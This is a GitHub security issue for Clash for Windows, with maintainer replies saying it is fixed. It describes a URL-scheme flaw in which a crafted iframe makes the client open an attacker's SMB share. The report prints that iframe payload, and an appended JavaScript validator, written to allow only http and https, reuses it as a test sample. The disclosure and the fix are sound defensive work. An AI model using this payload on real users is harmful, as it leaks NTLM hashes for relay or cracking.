[Clash for Windows] URL Scheme security issue #910
Comments
@burpheart HTTP protocol limit will be added in the next release. Thank you for the report.

Clash for Windows fixed it

affected Product: clash for windows

Hey @burpheart and @Dreamacro !

Environment
OS: windows
Description
The vulnerability is similar to the TeamViewer CVE-2020-13699 vulnerability.


An attacker could embed a malicious iframe in a website with a crafted URL
(<iframe src='clash://install-config?url=\\attacker\2131'></iframe>)
that would launch the Clash Windows client and force it to
open a remote SMB share. Windows will perform NTLM authentication when
opening the SMB share and that request can be relayed (using a tool like
responder) for code execution (or captured for hash cracking).
Possible Solution
Limit fetching of configuration files to http or https
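More information
This vulnerability is similar to TeamViewer's CVE-2020-13699 vulnerability: https://cert.360.cn/warning/detail?id=d31cb7d9342a5ab0973ab2e5e28ddd84
An attacker can use a carefully crafted iframe to launch the Clash application, for example (<iframe src='clash://install-config?url=\\attacker\2131'></iframe>),
and make it access a specified SMB server.
When Clash accesses the attacker's SMB server to fetch the configuration file,
Windows performs NTLM authentication and sends the NTLM hash to the attacker's server.
The attacker can use the NTLM hash for operations such as cracking the user's password.
This vulnerability poses a certain degree of harm.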
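
The restriction proposed under "Possible Solution", sketched as an added example (not Clash for Windows code and not written by anyone in this thread): a Node.js check that parses a `clash://install-config` link and accepts its `url` parameter only when it is an absolute http or https URL. The function and constant names are hypothetical, and the sample links are constructed.

```javascript
'use strict';
// Added example: allowlist check for the `url` parameter of a
// clash://install-config link. All names here are hypothetical.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns the normalized http(s) URL to download, or null when the link
// must be ignored.
function configUrlFromSchemeLink(link) {
  let outer;
  try {
    outer = new URL(link);
  } catch {
    return null; // not a parseable URL at all
  }
  if (outer.protocol !== 'clash:' || outer.hostname !== 'install-config') {
    return null; // some other scheme or action
  }
  const raw = outer.searchParams.get('url'); // percent-decoded value
  if (!raw) return null;

  let inner;
  try {
    // Parsed without a base URL: UNC paths (\\host\share) and //host/share
    // carry no scheme, so they throw here instead of reaching the file APIs.
    inner = new URL(raw);
  } catch {
    return null;
  }
  // file:, smb: and drive letters parsed as a scheme ("c:") are all rejected.
  if (!ALLOWED_PROTOCOLS.has(inner.protocol)) return null;
  // Return the parsed form, so the downloader never re-interprets the raw
  // string (for example "http:\\host\path") as a filesystem path.
  return inner.href;
}

// Constructed sample links, printed with the decision for each.
const SAMPLE_LINKS = [
  'clash://install-config?url=https%3A%2F%2Fexample.com%2Fconfig.yaml',
  'clash://install-config?url=\\\\attacker\\2131',
  'clash://install-config?url=%5C%5Cattacker%5C2131',
  'clash://install-config?url=file://attacker/2131',
];
for (const link of SAMPLE_LINKS) {
  console.log(link, '->', configUrlFromSchemeLink(link));
}
```

The check belongs in the code that handles the custom URL scheme, before any file or network API sees the value.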